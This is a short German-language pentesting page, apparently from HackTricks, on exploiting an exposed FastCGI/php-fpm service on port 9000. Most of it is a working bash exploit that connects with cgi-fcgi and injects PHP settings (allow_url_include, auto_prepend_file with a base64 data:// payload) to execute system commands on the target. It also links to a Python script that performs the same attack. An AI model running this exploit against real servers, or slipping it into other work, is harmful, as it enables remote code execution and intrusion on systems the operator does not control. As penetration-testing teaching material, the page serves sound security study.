9000 - Pentesting FastCGI

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

Grundinformationen

Wenn du lernen möchtest, was FastCGI ist, schaue dir die folgende Seite an:

disable_functions bypass - php-fpm/FastCGI

Standardmäßig läuft FastCGI auf Port 9000 und wird von nmap nicht erkannt. Normalerweise hört FastCGI nur auf localhost.

RCE

Es ist ziemlich einfach, FastCGI dazu zu bringen, beliebigen Code auszuführen:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

oder Sie können auch das folgende Python-Skript verwenden: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Last updated